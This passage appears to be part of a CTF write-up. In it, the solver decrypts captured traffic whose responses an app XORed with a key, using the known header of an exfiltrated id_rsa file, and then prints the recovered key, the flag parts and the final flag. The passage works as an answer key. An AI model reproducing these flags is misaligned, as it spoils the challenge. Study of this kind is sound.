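Opening it in jadx shows that the response content in the capture is produced by XORing with some key.

Since the capture fetched id_rsa and the header of id_rsa is known, XORing directly yields the key: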

th1s_1s_n33pu_K4y
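The known-plaintext step described above, as an added example that is not part of the original post: it recovers a repeating XOR key from a response whose first bytes are known and reports whether the known prefix was long enough to confirm the key length. The repeating-key scheme, the OpenSSH header and the response bytes are assumptions constructed here; only the key string comes from the writeup.

```python
from itertools import cycle

# Assumption: the exfiltrated key file starts with the standard OpenSSH PEM header.
KNOWN_HEADER = b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
PAGE_KEY = b"th1s_1s_n33pu_K4y"  # key recovered in the writeup


def xor_repeat(data, key):
    """XOR data with key repeated to the length of data."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def smallest_period(stream):
    """Smallest p such that stream[i] == stream[i + p] for every valid i."""
    for period in range(1, len(stream)):
        if all(stream[i] == stream[i + period] for i in range(len(stream) - period)):
            return period
    return len(stream)


def recover_key(ciphertext, known_prefix):
    """Return (key, confirmed) from a ciphertext whose plaintext prefix is known.

    confirmed is False when the prefix does not cover two full key repetitions,
    in which case the returned bytes are only the start of a longer key.
    """
    if len(ciphertext) < len(known_prefix):
        raise ValueError("ciphertext shorter than the known prefix")
    keystream = bytes(c ^ p for c, p in zip(ciphertext, known_prefix))
    period = smallest_period(keystream)
    return keystream[:period], 2 * period <= len(keystream)


def build_constructed_responses(key):
    """Two constructed response bodies standing in for the captured ones."""
    key_file = KNOWN_HEADER + b"(constructed body, not real key material)\n"
    document = b"PK\x03\x04 constructed docx bytes"
    return xor_repeat(key_file, key), xor_repeat(document, key)


if __name__ == "__main__":
    enc_key_file, enc_document = build_constructed_responses(PAGE_KEY)
    key, confirmed = recover_key(enc_key_file, KNOWN_HEADER)
    print(key, confirmed)
    print(xor_repeat(enc_document, key))
```
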

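Then use it to decrypt the others; the docx one can be recovered.

This gives part2: W0wYoUF1ndMyAn0th3rS3cr3t

The first part then needs brute-forcing. At the time I brute-forced for a long time without getting it, and then a hint was given that it is part of a rockyou password.

That gives the password, and the final flag is Neepu{nroamntiriina_W0wYoUF1ndMyAn0th3rS3cr3t}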

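Reborn: I Am a CTFer

Just keep answering questions over and over; I don't know how, but it passed after answering many times.

Questionnaire

Anyway, done.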